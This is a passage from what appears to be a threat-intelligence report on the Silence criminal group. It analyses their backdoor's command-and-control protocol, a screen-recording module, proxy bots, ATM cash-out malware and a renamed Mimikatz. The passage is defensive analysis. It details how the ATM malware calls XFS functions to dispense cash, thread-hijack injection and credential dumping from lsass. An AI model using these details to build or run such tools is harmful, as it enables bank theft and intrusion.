response to the first request from the client, the C\u0026C server sends a server\r\nresponse (\u003cresponse1\u003e), which, according to debugging information in the file, is\r\nthe identifier of the client. This is 1234567890 on the screenshot below:\n\n47\r\n• \"xy=1\" and User-Agent are hard coded, meaning they can serve as a basis for\r\nwriting signatures to detect malicious network traffic:\r\nWe have also seen other User-Agents in different versions of the Trojan:\r\nYear user agent\r\n2017 Microsoft Internet Explorer\r\n2018 \\r\\n\\r\\n\r\n• Next, the file sends the second \u003crequest2\u003e request to the C\u0026C. It looks as\r\nfollows: \"http://cnc/index.php?xy=2\u0026axy=\u003cresponse1\u003e\", where \u003cresponse1\u003e is\r\nthe response of the server to \u003crequest1\u003e\r\nExample:\n\nSilence\r\nMoving into the darkside\r\n48\r\nBelow is a table of C\u0026C commands that the malware executes:\r\nCommand Command\r\ntype\r\nDescription Example of Use\r\nhtrjyytrn reconnect Terminates the command interpreter,\r\nclears all temporary files, connects to\r\nthe C\u0026C \"from scratch\"\r\nhtrjyytrn\r\nhtcnfhn restart Terminates the command interpreter\r\nand restarts it\r\nhtcnfhn\r\nytnpflfybq notasks No operation ytnpflfybq\r\n#wget wget Download a file from a remote server\r\nand save in the current directory\r\n#wget\r\n192.168.19[.]171/f.\r\nexe 1.exe\r\nshell\\n shell Launch the command interpreter shell\\n\r\n\\n\u003ccmd\u003e run Execution of the arbitrary command\r\nof the OS via the command interpreter\r\n\\nipconfig\r\n• It is worth noting that the command codes are Cyrillic words typed with an\r\nEnglish layout. This shows that the developer is a Russian speaker.\r\n• The ‘restart’ command restarts the command interpreter, for example if the\r\ncurrent console is unresponsive.\r\n• The shell\\n command launches a new hidden instance of the OS command\r\ninterpreter, which will be used to covertly launch commands (the last string in\r\nthe table of commands) on the infected machine.\n\n49\r\n• The #wget command delivers the files from a remote server to a PC. It it used\r\nto specify which file to download and under what name to save it. The files are\r\nsaved in the folder where the executable file of the Trojan was launched.\r\n• If none of the control commands of the C\u0026C were received, the connection can\r\nbe re-established right away or with a 1 or 10-second delay and in cycle.\r\nHow are arbitrary commands launched?\r\nAfter receiving the shell command, the backdoor can receive an arbitrary\r\ncommand from the C\u0026C server for execution (\\n\u003ccmd\u003e). For example, it might be a\r\ncommand to enumerate local network interfaces, \"ipconfig\". Below is a screenshot\r\nof the client-server traffic with a server sending this command to a client.\r\nAfter receiving the command, the program writes it into stdin of the command\r\ninterpreter using the WriteFile() function. The command interpreter then executes\r\nthe command. Next, the backdoor waits for the results of command execution,\r\nreads it using ReadFile() function and sends the output to the C\u0026C server.\r\nInteraction with command interpreter\r\nThe bot does not embed into the cmd.exe process. The launch of commands\r\nand receiving the results is done by creating a command interpreter process\r\nand stating data input and output devices (handles) that are open in the current\r\n(parent) process of the objects (pipes). This is done thanks to the special system\r\nstructure, _STARTUPINFO, and a flag, bInheritHandles == TRUE (allows inheritance\r\nof handles of the parent process).\n\nSilence\r\nMoving into the darkside\r\n50\r\nThe exchange of data with the command interpreter is implemented as calling the\r\nWriteFile (to launch the commands) and ReadFile (to obtain the results of their\r\nexecution) functions.\r\nThe scheme for launching arbitrary commands:\r\n• Reads new command in cycle, if one has appeared\r\n• Sends a new command for execution to stdin of the command interpreter\r\n• The file under investigation receives the data size for reading == len from the\r\npipe\r\n• Reads data with len size from stdout of the command interpreter\r\n• Codes data (with result output) and sends to the C\u0026C server\r\n• Rereads for new data every second\r\n• Checks whether the command interpreter has been closed every second\n\n51\r\nThe data from the command interpreter is taken out using the\r\nPeekNamedPipe(reading the size of a buffer) + ReadFile (reading the content\r\nof output) functions. The scanned data is encoded using the coding algorithm\r\nwith the native alphabet, \"AiL7aIm3BzpxbZq0CKs5cYU1Dkt-dVw.Elr9eNW_\r\nFnT8fOu4GoS,gvR6HMQ2hyPX/\".\r\nDespite the fact that the coding algorithm uses random data generation, the\r\nresulting coded data can be decoded on the server by the attacker because:\r\n1. The random data generator has small entropy (it only generates digits from 0 to\r\n3);\r\n2. The random data generator was designed this way to ensure that random data\r\ncould be excluded due to the formula (because the result of multiplication will\r\nalways be divisible by 4, and the random numbers are always less than 4);\r\n3. Each character of the source data is coded into two symbols using two different\r\narithmetic operations (formulas). This allows the source data to be decoded by\r\nsolving the combined equations.\r\nThe usage of pseudo-random numbers helps to avoid being detected by the\r\nsecurity systems.\r\n \r\nAfter execution of a command in the command interpreter, the output is encoded\r\nand sent to the C\u0026C server in the following format: \"http://cnc/index.php?xy=3\u0026a\r\nxy=\u003cresponse1\u003e\u0026bxy=\u003cencoded_cmdexe_data\u003e\"\n\nSilence\r\nMoving into the darkside\r\n52\r\nAn example of request is presented below:\r\nData intake after execution in the command interpreter:\r\nCoding:\r\n1 – Data before coding\r\n2 – Data after coding\n\n53\r\nThe encoded data is then sent to the C\u0026C server:\r\nSilence.SurveillanceModule\r\nFile Name MD5 hash Type of software\r\nsmmsrv.exe 242b471bae5ef9b4de8019781e55\r\n3b85\r\nSilence.SurveillanceModule\r\nDesktop video recorder\r\nmss.exe d7491ed06a7f19a2983774fd50d65fb2 Screenshotter\r\nsmmsrv.exeis an executable file for capturing the screen content of the infected\r\nmachine. To do this, the software uses the StartServiceCtrlDispatcher function to\r\ncreate its own service called \"Default monitor\".\r\nThe service processes only one command, namely SERVICE_CONTROL_STOP.\r\nAfter receiving the command, the service switches to SERVICE_STOP_PENDING\r\nstatus. If there is an error, it displays the debugging string: \"ServiceCtrlHandler:\r\nSetServiceStatus returned error\".\r\nThe event and flow, where all functions are performed, are created at the entry\r\npoint of the service. During creation, there might be some errors. The bot will give\r\nnotification of this using the following debugging messages:\r\n• \"My Sample Service: ServiceMain: SetServiceStatus returned error\"\n\nSilence\r\nMoving into the darkside\r\n54\r\n• \"ServiceMain: SetServiceStatus returned error\"\r\n• \"ServiceMain: CreateEvent returned error\"\r\n• \"ServiceMain: RegisterServiceCtrlHandler returned error\"\r\nIn the main function, the following actions happen during an infinite loop:\r\n• If there is no pipe index: \"\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}\"\r\nthe pipe is created.\r\n• Reading the content of mss.txt file, which has to be located in the same folder\r\nas the file under investigation. The file contains the name of a user, from which\r\nit should start the mss.exe program (described further).\r\n• Decompression and saving the C:\\Users\\\u003c%Username%\u003e\\AppData\\Local\\Temp\\\r\nmss.exe file\r\n• Launch of the mss.exe application on behalf of the user, which is described in\r\nmss.txt (the functionality of the application is described further)\r\n• Reading data from pipe, converting it to image/png format and saving to the C:\\\r\nUsers\\\u003c%Username%\u003e\\AppData\\Local\\Temp\\out.dat file. Errors that occur while\r\nworking with the out.dat file are logged as debugging messages by the bot:\r\n\"Error code \u003c%result of GetLastError%\u003e\\n\"\r\nmss.exe, extracted by the previous program, takes screenshots in cycles, converts\r\nthem into image/bmp and streams. After this, it writes everything in a pipe with\r\nthe following name: \"\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}\".\r\nThe program features checking for launch in a sandbox:\r\nThus, the out.dat file contains a pseudo-video stream\r\nSilence.ProxyBot\r\nFile Name MD5 hash\r\nsamsung.exe 121c7a3f139b1cc3d0bf62d951bbe5cb\r\nsok83.exe dc4ac53350cc4b30839db19d8d6f3b5f\r\nfirefoxportebles.exe a6cb04fad56f1fe5b8f60fabf2f64005\r\napp.exe a6771cafd7114df25ac0ef2688722fdf\r\napcs.exe 88cb1babb591381054001a7a588f7a28\r\nThe file is written in Delphi and has functions for traffic redirection between a\r\nremote and a local server. It can collect and send information about the system\r\nto the remote server and save the data to the register. The program, classified\n\n55\r\nas ProxyBot, is designed to access isolated segments of the network via an\r\nintermediate node.\r\nThe executable file contains two strings of great length, which are not involved in\r\nnormal operation. They could be used, but the developers created a condition for\r\nthis which is never true.\r\nOnce launched, the program performs the following activity:\r\n• The random numbers generator generates a random number from 0 to 10. The\r\ncode for working with the abovementioned lengthy strings is only executed\r\nwhen the random numbers generator generates the number 36567, which never\r\nhappens. Obviously, this piece of code was added for testing purposes or, most\r\nlikely, to evade security means.\r\n• If the application was launched with the arguments of the command line, then\r\nthe following data is written to the register HKLM\\SYSTEM\\CurrentControlSet\\\r\nServices\\MicrosoftService\\Note = \u003ccommand line arguments\u003e\n\nSilence\r\nMoving into the darkside\r\n56\r\n• It is important that the registry receives data from the arguments of the\r\ncommand line, and this data can be sent to the server even after subsequent\r\nlaunches, when the client is launched with no arguments at all. Thus, the\r\napplication under investigation can be used to collect other data, save the data\r\n(as an argument of the command line when launched) into the registry, and\r\nthen send it.\r\n• A new registry key is created called Types Supported. It is not used anywhere\r\nfurther: HKLM\\SYSTEM\\CurrentControlSet\\Services\\Eventlog\\Application\\\r\nMicrosoft Audit Service\\TypesSupported = 7\r\n• The file under investigation tries to connect to the 185.29.10[.]117:443 network\r\nnode\r\n• The program features two ports: 443 and 444. The first one, 443, is a remote\r\nport, which should be tapped to connect with C2. The second one, 444, is used\r\nonly once when sending data about the system from the client to the server.\r\nStated in the file but not used ports for possible connections: 3389 and 8081\r\n• The connection is established at the layer of TCP sockets (Http and Https\r\nprotocols are not used)\r\n• If the connection is not established, the attempts to connect and send files will\r\nbe repeated every 42 seconds or 1 minute (in two different threads).\r\n• After successful connection, the server gets information about the system: a\r\nstring with 16 random characters, PC name, user name, system right (user SID),\r\ncountry\\locale, local IP, number of the second port embedded into the build.\r\nThe length of the statistics package is always 208 bytes.\n\n57\r\n• The file performs 3 different requests to the server. If the responses are not\r\nequal to zero, it makes 4 more requests in a row (4th,5th,6th,7th requests).\r\n• Then the new TBacklinkClientThread thread is launched. The C\u0026C server\r\naddress and 2 additional arguments are passed in the thread as arguments.\r\nThe first argument is the response to the server’s request 1 and is also the\r\nport for connecting to the remote server and traffic redirection. The second\r\nargument is the server’s response to request 4.\r\n• The connection to the C\u0026C server is established via the port from the response\r\nto request 1. The data from response 4 is sent there.\r\n• If the connection is successful and the response is received, the\r\nTSocksClientThread thread is launched.\r\n• The client reads another portion of data from the server and decrypts it. The\r\nencryption is done using XOR operations with a 0Dh byte\r\nTherefore, partially binary and partially textual protocol with encryption is\r\nused by the server to send commands to the client to request data from other\r\nnetwork nodes (stated by the server). In other words, the client can be used as an\r\nintermediate proxy server.\r\nSilence.ProxyBot.Net\r\nFile Name MD5 hash Type of software\r\nsapp.exe\r\nSocksTest.exe\r\n50565c4b80f41d2e7eb989cd24082aab Silence.ProxyBot.NET\r\nbackconnect proxy\r\nSocksTest.exe 8191dae4bdeda349bda38fd5791cb66f\r\nIn the beginning of 2018, we discovered the new version of the ProxyBot\r\ndeveloped for the .NET framework. The file named sapp.exe_ (56767 bytes, md5:\r\n50565C4B80F41D2E7EB989CD24082AAB) is an executable program for .Net. The\r\noriginal name of the program is SocksTest.exe. According to the information from\r\nthe PE heading of the file, it was compiled on January 25, 2018.\n\nSilence\r\nMoving into the darkside\r\n58\r\nThe program executes the tasks of the proxy server and allows the attacker\r\nto redirect traffic from the current node to the backconnect server at\r\n185.161.208[.]61:443. The supported protocols are Sock4\\Socks5. The program is\r\ncompiled for .NET and needs the .NET Framework 4.0 package installed to launch.\r\nThe SmartAssembly tool is used for obfuscation.\r\nThe proxy contains encrypted settings for its operation, which are decrypted\r\ndynamically using one of the methods from the SocksTest.Settings class. The\r\ndecrypted settings of the proxy are presented below:\r\nFrom these settings it is clear that for its operation the proxy uses a backconnect\r\nserver at 185.161.208[.]61 port 443, user name \"noname\" and password\r\n\"password\".\r\n• When connected to the backconnect server, the proxy sends a request with the\r\nname of the current user and version of the operating system.\r\n• The file under investigation can create a log file and write debugging\r\ninformation about the operation of the application. However, in the current\r\nconfiguration and with the current application settings, the log file is not\r\ncreated (DebugEnabled=false).\n\n59\r\n \r\nThe log will be saved to c:\\intel\\slog.log\r\n• If the connection with the backconnect server is lost, the file under\r\ninvestigation tries to reconnect in cycles.\r\n• The backconnect server may send commands to the proxy to make network\r\nrequests to undefined network nodes and redirect the results back to the\r\nbackconnect server.\r\n• The proxy supports the following protocols: Sock4\\Socks5.\r\nBelow you will find the first request sent from the program to the backconnect\r\nserver:\r\nDespite the fact that the sniffer recognizes the traffic as SSL, this is not the case.\r\nAs you can see in the image above, the data transferred is not encrypted.\n\nSilence\r\nMoving into the darkside\r\n60\r\nSILENCE ATM PACK\r\nLogical attacks on ATMs were the first activity of Silence Group that we detected.\r\nThe attackers would penetrate the bank’s corporate network, gain entry to the\r\nvirtual network to which all ATMs were connected and inject unique programs into\r\nthe ATMs that affected the dispenser process operations.\r\nThis unique pack incorporated the following programs:\r\n• A Dropper to unpack (out of itself) the Atmosphere library to affect the\r\ndispenser and the injector to inject Atmosphere into the dispenser process.\r\n• The basic DLL Atmosphere library to affect the dispenser.\r\n• An executable injector program to inject the library into the process\r\nAtmosphere.Dropper\r\nFile name MD5 hash\r\napp3.exe 4107F2756EDB33AF1F79B1DCE3D2FD77\r\napp4.exe 6743F474E3A6A02BC1CCC5373E5EBBFA\r\napp11.exe 14863087695D0F4B40F480FD18D061A4\r\nJ133295_18107_a4.exe f69c35969745ae1b60403868e085062e\r\nIn the course of further analyses of the Group, we identified a large number of\r\nprograms of that type. It was clear that the programs were compiled on the go,\r\nas the attack was unfolding. Some of them did not work, being designed for ATMs\r\nof one specific type, while the attackers tried to use them on ATMs of a different\r\ntype. Thus, programs had to be compiled along the way. As a result, some\r\nDroppers had to inject the library to affect the dispenser in a strictly defined\r\nprocess; others only had to extract the library, while the injecting was done by\r\nanother Injector program. In total, we detected up to 10 types of programs with\r\nminor differences between them. Most of them had logical errors that in some\r\ncases caused program failure.\r\napp3.exe works to inject code into SFX manager’s process fwmain32.exe (or,\r\nalternatively, sop.exe) for Wincor Nixdorf ATMs; to exploit API functions exported\r\nby MSXFS library.dll to affect the ATM; to gain information about the ATM and the\r\namount of cash in its cassettes; and to issue banknotes to the attacker.\r\n• When run, this file checks if the process fwmain32.exe is running. If not,\r\nit shuts down.\n\n61\r\n• fwmain32.exe is XFS Manager’s app process for Wincor Nixdorf ATMs.\r\n• If the process fwmain32.exe is found running, it extracts the dynamic librar\r\ny86EA1F46DF745A30577F02FC24E266FF and saves it to the directory C:\\intel\\\r\nlib_\u003crand_chars\u003e.dll, where rand_chars are symbols [A-Za-z] and [\\]^_`.\r\nExamples of file names:\r\n\"c:\\intel\\lib_`TKXV.dll\"\r\n\"c:\\intel\\lib_m_rMJ.dll\"\r\n\"c:\\intel\\lib_f`lUX.dll\"\r\nImportant: The directory c:\\intel is regarded as existent. If not, this file does not\r\ncreate it. The program tries to check if directory C:\\intel\\ is available by calling the\r\nWinAPI function GetFileAttributesA.\r\nThe programmer overlooked the fact that if the searched file did not exist in\r\nprinciple the function would return -1 (0xFFFFFFFF), condition !(0xFFFFFFFF \u0026 0x10)\r\nwould operate incorrectly and the directory would not be created.\r\n• It then injects the said dynamic library into the process fwmain32.exe using\r\nthe standard technique Thread Hijack\" OpenProcess + GetThreadContext+\r\nWriteProcessMemory + SetThreadContext + ResumeThread.\r\n• Payload is run as a shellcode to load its dll file.\r\n• The executable file runs the code of the said dynamic library in the context of\r\nthe process fwmain32.exe and shuts down.\r\n• As it operates, it shows debug information on the console.\n\nSilence\r\nMoving into the darkside\r\n62\r\nAtmosphere.Injector\r\nFile name MD5 hash Program type\r\nfuckacp.exe B3ABB10CC8F4CBB454992B95064A9006 Atmosphere.Injector\r\ninjector.exe 1EE9F88CC7867E021A818DFF012BDF9E Atmosphere.Injector\r\nThis program helps the attacker to inject DLL into the relevant process. Command\r\nline parameters are used to specify which dynamic library must be injected in\r\nwhich particular process. It is worth noting that the process is identified not by its\r\nname, but by its system identifier (process id).\r\nThe code for dynamic library injection is similar to that in the dropper.\r\nSimilarly, we detected several programs of that type. Their compilation settings\r\nwere different and some libraries were statically linked. This is most likely\r\nbecause the attacker could not run the program on those ATMs which did not\r\nhave libraries that the program required.\r\nAtmosphere\r\nFile name MD5 hash Program type\r\nlib_HpBsi.dll 79E61313FEBE5C67D168CFC3C88CD743 Atmosphere\r\nli.dll C49E6854C79043B624D07DA20DD4C7AD Atmosphere\r\nlib_HkUEl.dll 86EA1F46DF745A30577F02FC24E266FF Atmosphere\r\nc8d0ccd2e58c1c467ee8b138c8a15eec\r\nd81ae5e0680d09c118a1705762b0bfce\r\nlib_xqkRN.dll ddb276dbfbce7a9e19feecc2c453733d\r\nThere are several programs of that kind too. See below for analysis results and\r\ndifferences.\n\n63\r\nThe file lib_HkUEl.dll (size 61440 bytes, md5: 86EA1F46DF745A30577F02FC24E266FF)\r\n• This malicious file operates by injecting code in XFS Manager’s process\r\nfwmain32.exe for Wincor Nixdorf ATMs and using API functions exported by the\r\nlibrary MSXFS.dll (loaded into the process fwmain32.exe).\r\n• As the dynamic library is run/loaded into the address range of the process (in\r\nour case, the app fwmain32.exe), a new thread is started.\r\n• Once the library is unloaded (or the fwmain32.exe parent process terminates),\r\nthis thread terminates.\r\n• In the course of operation, this file creates the file c:\\intel\\___log.txt and writes\r\nits operations log in it.\r\n• This file uses / may call the following XFS API functions:\r\n• It copies pointers and creates trampoline to functions WFSGetInfo and\r\nWFSExecute in its dynamic memory.\n\nSilence\r\nMoving into the darkside\r\n64\r\n• By calling function WFSGetInfo with flag dwCategory == WFS_INF_CDM_CASH_\r\nUNIT_INFO the attacker can gain information about the status and contents of\r\nall cassettes in the ATM.\r\n• The dispenser is identified by calling the function WFSGetInfo with the flags\r\ndwCategory == 301(WFS_INF_CDM_CASH_UNIT_INFO) and 401 (value unknown).\r\n• The function WFSGetInfo to identify the dispenser is called sequentially 30\r\ntimes with different hService values ranging from 1 to 30 – obviously to search\r\nfor services in the system and locate the service handle that corresponds to the\r\nrunning ATM service. This could be done by calling the function WFSOpen, but\r\nthe attacker probably thought that the argument of the first function (the ATM’s\r\nlogical name in the system) could be non-standard or different on different\r\nATM types, so he decided to do an ATM device search by using the brute force of\r\nopen service handles.\r\n• A thread is then created to check every one second if there are commands from\r\nthe attacker and execute them if needed\r\nCommand transmission\r\nOnce the command file is found, its contents are read by the function \"fread\" and\r\nare then split into lines. Characters between quotation marks (\") are extracted\r\nfrom the first line. Then the first character extracted from quotation marks is\r\nconverted into a command number. Once the command is received, WinAPI of the\r\nfunctions CryptAcquireContextA and CryptGenRandom generates a line with a\r\nrandom set of characters. The size of the line is not less than the size of the file,\r\nplus a random number between 10 and 1024. The resulting line is then added to\r\nthe end of the file, and the file is deleted.\n\n65\r\n• The bot receives commands as newly created files with *.cmd in this file’s root\r\ndirectory.\r\n• If there is any file with the extension *.cmd, the app will search for, open and\r\nread it.\r\n• After reading, the command file is supplemented by random data of random\r\nlength and the file is deleted\r\nCommands in the file *.cmd are transmitted as plain text: \u003cone_upper_char\u003e\r\n(including quotations marks).\r\nThe command that is activated depends on the character between the quotation\r\nmarks.\r\nFor example, if the content of the command file is A (with quotation marks), the\r\ncommand indexed 3 will be executed: retrieve information about ATM cash units.\n\nSilence\r\nMoving into the darkside\r\n66\r\nSupported commands are listed below.\r\nCommand Description\r\n1,8,9,10,11,12,13 Write return code of the last executed command in a separate\r\nfile and log file\r\n2 Retrieve ATM cash unit data and write the result in the log file,\r\nwith formatting (advanced write mode)\r\n3 Retrieve ATM cash unit data\r\n4 Retrieve ATM cash unit data and write the result in the log file\r\n5 Inject code\\modify the command counter of the current\r\napp’s random thread (fwmain32.exe) by calling the\r\nfunctions sequence GetCurrentProcessId + OpenThread +\r\nGetThreadContext + SetThreadContext\r\n7 Issue cash in a one-off mode\r\n? Issue all cash, interval 3 seconds\r\n? Establish a limit on cash issuance\n\n67\r\nTo withdraw cash, the attacker first executes commands to retrieve information\r\non the existing banknotes. This information is also recorded in the log file as the\r\nfollowing line:\r\n|INDEX:\u003ca\u003e|CU state:\u003cb\u003e|Type:\u003cc\u003e|Values:\u003cd\u003e|Currency_ID:\u003ce\u003e|Money count:\u003cf\u003e|,\r\nwhere a is the index, b is the state of the cassette (full/empty, etc.), c is the\r\ncash unit type, d is the banknote nominal value, e is the currency by ISO (three-character), and f is the current number of banknotes.\r\nThis is followed by command D to withdraw cash.\r\nWhen this command is executed, a file is created named as a command file, but\r\nwith extension 007, i.e. if the command file is second.cmd, the new file will be\r\nsecond.007, with the code of the last executed command. The log file will also\r\nhave the following line:\r\n[2017/11/15 18:15:24.111] last command response code 0\r\nThe resulting code for last command execution is also written at the end of the\r\nline.\r\nAmong other things, we also found an old virtual interface table that handles\r\ncommands in the code. The handler looks different there: it can issue banknotes\r\nfrom all the cassettes one by one with an interval of 3 seconds. Banknote issue is\r\ntriggered by the same function everywhere, including this handler.\r\nShown below is the code that adds unnecessary information and deletes the file.\r\nPresumably, the file should have been rewritten by the generated string and\r\ndeleted afterwards, but in fact this string is only added to the end of the file, as\r\ncan be seen from the snapshot above.\r\n \r\nIt is worth noting that one iteration of the program can only process one file and\r\nonly one command from it. Even though the content is broken down into lines, it\r\nis only the first line that is processed, and only the first character from it (the one\r\nbetween quotation marks) is used and converted to the command number.\n\nSilence\r\nMoving into the darkside\r\n68\r\nWithdrawing cash\r\nCash is withdrawn by calling the function WFSExecute with the flag\r\ndwCommand==WFS_CMD_CDM_DISPENSE (issue banknotes from cassettes).\r\n \r\nFunction prototype:\r\nHRESULT extern WINAPI WFSExecute ( HSERVICE hService, DWORD\r\ndwCommand, LPVOID lpCmdData, DWORD dwTimeOut, LPWFSRESULT *\r\nlppResult);\r\nThe code of the WFS_CMD_CDM_DISPENSE command to issue banknotes from\r\ncassettes serves as the second argument.\r\nThe banknote denomination parameters are transmitted during the call.\r\nDenomination is a selection of the number of banknotes from specific cassettes\r\nto be put together as the required amount for withdrawal (i.e. which banknotes\r\nare to be issued).\r\nThe structure below serves as the third argument:\r\nIt is interesting to note that the field bPresent of this structure is set to TRUE.\r\nThis means that after the command is executed to collect banknotes from the\r\ncassettes, the dispenser will issue them to the customer. This explains why this\r\nfile does not use the command to issue cash directly (by calling WFSExecute +\r\ncommand code WFS_CMD_CDM_PRESENT).\n\n69\r\nThe file lib_xqkRN.dll (size 122880 bytes, md5: DDB276DBFBCE7A9E19FEECC2C45373\r\n3D) is a slightly different version of Atmosphere.\r\nA binary comparison of the files lib_xqkRN.dll and lib_HkUEl.dll shows that 38%\r\nof the first file’s functions equals ~100% of the functions with the corresponding\r\ncode in the second file (i.e. 71% of all of the functions of the second file). The\r\nfunctions designed to affect the ATM are practically overlapping. One significant\r\ndifference is that this file has functions to read keys entered on the PIN pad.\r\nThis command helps the attacker retrieve information on the physical\r\narrangement of keys on the PIN pad and can subsequently be used to give a\r\ncommand to issue cash on demand (manually on the attacker’s PIN pad).\r\nThis means that the attacker is able to control cash withdrawal not only remotely\r\n(by sending a command to the ATM) but also physically (by pressing a combination\r\nof keys on the PIN pad).\n\nSilence\r\nMoving into the darkside\r\n70\r\nOther differences between the first and the second files in the rest of the code\r\nare based on:\r\n1. Different compiler settings and optimization in the first and second files.\r\n2. The fact that the first file lib_xqkRN.dll has a code added to it that the second\r\nfile does not have. This also explains why the first file has a larger number\r\nof functions. Principally, it is a cryptographic class code to encrypt RSA, AES,\r\nMD5, SHA-1, for which no code has been detected.\r\n3. Additionally, the second file has a list of currencies that the first sample\r\ndid not have. The code operating with these strings in this file is not called\r\nanywhere.\r\nAnother version of Atmosphere lib_HpBsi.dll (MD5 79E61313FEBE5C67D168CFC3\r\nC88CD743, 61440 bytes, timestamp: 59D94BD5 (Sat Oct 07 21:49:09 2017)), which\r\nthe DROPPER extracts from its resources, is also designed for withdrawing\r\nbanknotes from ATM cassettes. It has minor differences and the following\r\ncommand table:\n\n71\r\nCommand Description\r\n\"B\" Retrieves information about the contents of ATM cassettes. The\r\nline \"cash units info received\" is added to the log.\r\n\"A\" Retrieves information about the contents of the cassettes without\r\nlogging.\r\n\"Q\" Retrieves information about the contents of ATM cassettes.\r\n\"D\" One-off issue of banknotes of a specific denomination from the\r\nATM.\r\n\"H\" Suspends all threads in the process, except for its own, and uses\r\nthe GetThreadContext + SetThreadContext functions to redirect\r\nexecution to its own function.\r\n\"M\", \"R\", \"S\",\r\n\"P\", \"T\", \"L\"\r\nThe result of the last command execution is written to the file C:\\\r\nintel\\\u003cchrs\u003e.007. This command is also executed by default at the\r\nend of any other command.\r\n \r\nWe have also detected Atmosphere \"li.dll\" (MD5 C49E6854C79043B624D07DA20\r\nDD4C7AD, 57344 bytes, timestamp: 59DA3AE9 (Sun Oct 08 14:49:13 2017)), with a\r\n‘hacker-style’ representation of threads.\r\nSome debugging information is not available, and many lines were modified, e.g.,\r\nPinPad -\u003e \"QinQad\", DISPENSER -\u003e D1SP3NS3R, etc.\r\nAlso unavailable is some debugging information that was available in the first\r\nlibrary.\r\nThe format of the command is *.ccd, not *.cmd, but they share the same command\r\nhandler, i.e. the commands have the same format and perform the same actions.\r\nIn April 2018, Silence attacked another Russian bank, using Atmosphere to empty\r\nits ATMs. There were minor differences compared to the previous versions, but\r\nit was clear that the developer went a long way to debug the program and that\r\nhe eventually got rid of the unnecessary functions and enhanced the program’s\r\nsustainability.\n\nSilence\r\nMoving into the darkside\r\n72\r\nThe program uses the following command handlers:\r\nCommand number Command value\r\n2 Retrieve information about ATM cash units and write the\r\nresult in the log file, with formatting (extended write mode)\r\n3 Retrieve information about ATM cash units\r\n4,13 Retrieve information about ATM cash units and write the\r\nresult in the log file\r\n7 One-off cash withdrawal\r\n10 Suspend operations for 10 minutes\r\n11 Terminate app operation\r\n8 Withdraw all cash, interval 3 seconds\r\nBelow is a table that compares the old version with the new:\r\nFunction Old sample New sample\r\nWorking directory c:\\intel c:\\atm\\1\r\nProcess for injecting fwmain32.exe atmapp.exe\r\nMethod for launching\r\npayload after injection\r\ninto the process\r\nLoadLibrary shellcode LoadLibrary shellcode\r\n(with minor changes)\r\nDebugging info shown in\r\nthe console\r\nIn an extended format In a brief format, only\r\nthe number of detected\r\nprocesses\r\nList of XFS functions used WFMFreeBuffer,\r\nWFMAllocateBuffer,\r\nWFSExecute,\r\nWFSFreeResult,\r\nWFSGetInfo\r\nWFMFreeBuffer,\r\nWFMAllocateMore,\r\nWFMAllocateBuffer,\r\nWFSExecute,\r\nWFSFreeResult,\r\nWFSStartUp, WFSGetInfo\r\nFile size 60 Kbytes 84 Kbytes\r\nCreating springboards on\r\nfunction WFS*\r\nYes No\r\nRetrieving information on\r\ncassette status\r\nYes Yes\r\nDetermining dispenser\r\nand PIN pad status\r\nbefore operation (codes\r\n301 and 401)\r\nYes No\r\nSearching for hService\r\nhandles when calling\r\nWFSGetInfo\r\nYes No\n\n73\r\nFunctions available to\r\nread the keys entered on\r\nthe PIN pad\r\nYes No\r\nTransmitting commands\r\nthrough files with\r\nextension\r\n*.cmd *.c\r\nRandom data generation\r\nbased on\r\nCryptAcquireContextA +\r\nCryptGenRandom\r\nrand()\r\nWriting return code to file Yes, to file with extension\r\n*.007\r\nNo\r\nA command to modify\r\nthe command counter of\r\nthe current app’s random\r\nflow\r\nYes, command #5 No\r\nCommand to pause\r\nTrojan operation\r\nNo Yes\r\nOTHER PROGRAMS\r\nUtilities\r\nFarse\r\nFile name MD5 hash Program type\r\nm32.exe 40228a3ea22e61a0f53644881cd59281 Mimikatz\r\nThis file is a modified version of the well-known utility Mimikatz that extracts\r\nclear text credentials and hashes from memory. Mimikatz source code is available\r\non the developer’s page hххps://github[.]com/gentilkiwi/mimikatz.\r\nAnalysis of this file suggests that it is based on Mimikatz source code, with some\r\nnew functions added to the file.\r\nWe compared it to Mimikatz 2.1.1 x86, the latest available version at the time\r\nof writing this report. The file was found to contain artifacts that suggest that\r\nassembly had been based on source codes of earlier versions (\u003c 2.1.1).\r\nInformation in the header of the executable file suggests that it was compiled on\r\n19.09.2009 at 07:39:40 GMT.\r\n• A binary comparison of this file with the original mimikatz exe, version 2.1.1 x86,\r\nusing utility BinDiff, demonstrates that binary similarity between them is 25%\r\nand that this file has 91% of Mimikatz file functions.\n\nSilence\r\nMoving into the darkside\r\n74\r\n• The screenshot above shows the launch of this file for a random (knowingly\r\nnon-existent) command; the one below shows the launch of the original\r\nMimikatz.\r\n• Both apps responded identically to this argument in the command line,\r\nshowing a list of supported commands.\n\n75\r\nHow Farse is different from the original Mimikatz source code\r\n1. Banners and all mentions of \"mimikatz\" in the product are obliterated to the\r\nmaximum extent (although the developer could not do it everywhere). The\r\npurpose of this is obviously to hide this file from antivirus scanners.\r\n2. Some words – User, Domain, Password – are changed to U, D, P.\r\n \r\n3. Command names are different. The original command to extract OS\r\npasswords \"sekurlsa::logonpasswords\" is renamed as \"sss::logonpasswords\".\r\n4. Farse does not require the additional command \"mimikatz # privilege::debug\",\r\nunlike the original mimikatz. It automatically retrieves a debug privilege token\r\nto be able to extract data from the system process.\r\n5. This file automatically writes its results in the text file \"Farse.log\" in the\r\ncurrent directory. As an example, when an executable file is run with the\r\nargument \"sss::logonpasswords\", the extracted passwords and hashes will be\r\nsaved to this log file.\r\n6. User and system credentials are retrieved through the use of the function\r\n\"sss::logonpasswords\" (in the original source code, Mimikatz is called\r\n\"sekurlsa::logonpasswords\"). This function retrieves credentials from the lsass\r\nsystem process.exe (Local Security Authority Subsystem Service).\r\nCleaner\r\nFile name MD5 hash Program type\r\ncleaner.exe 8A9D278B473B6C5625D57739714702FC RAdmin log cleaner\r\nThis file is designed to write garbage to the log file of RAdmin server connections\r\ndeployed on the victim machine and to delete that file afterwards. Due to\r\nprogrammer’s error, garbage is written not to the beginning of the file, but to\r\nits end, which makes it possible to retrieve the original log. The program was\r\ncompiled on 08.10.2017 at 07:46:09.\r\nWhen run, the program generates random values whose length is file size\r\nC:\\Windows\\System32\\rserver30\\Radm_log.htm +10 up to\r\nC:\\Windows\\System32\\rserver30\\Radm_log.htm + 1024:\n\nSilence\r\nMoving into the darkside\r\n76\r\nIt then writes them to the end of the file and deletes the file. Presumably,\r\nthe programmer’s 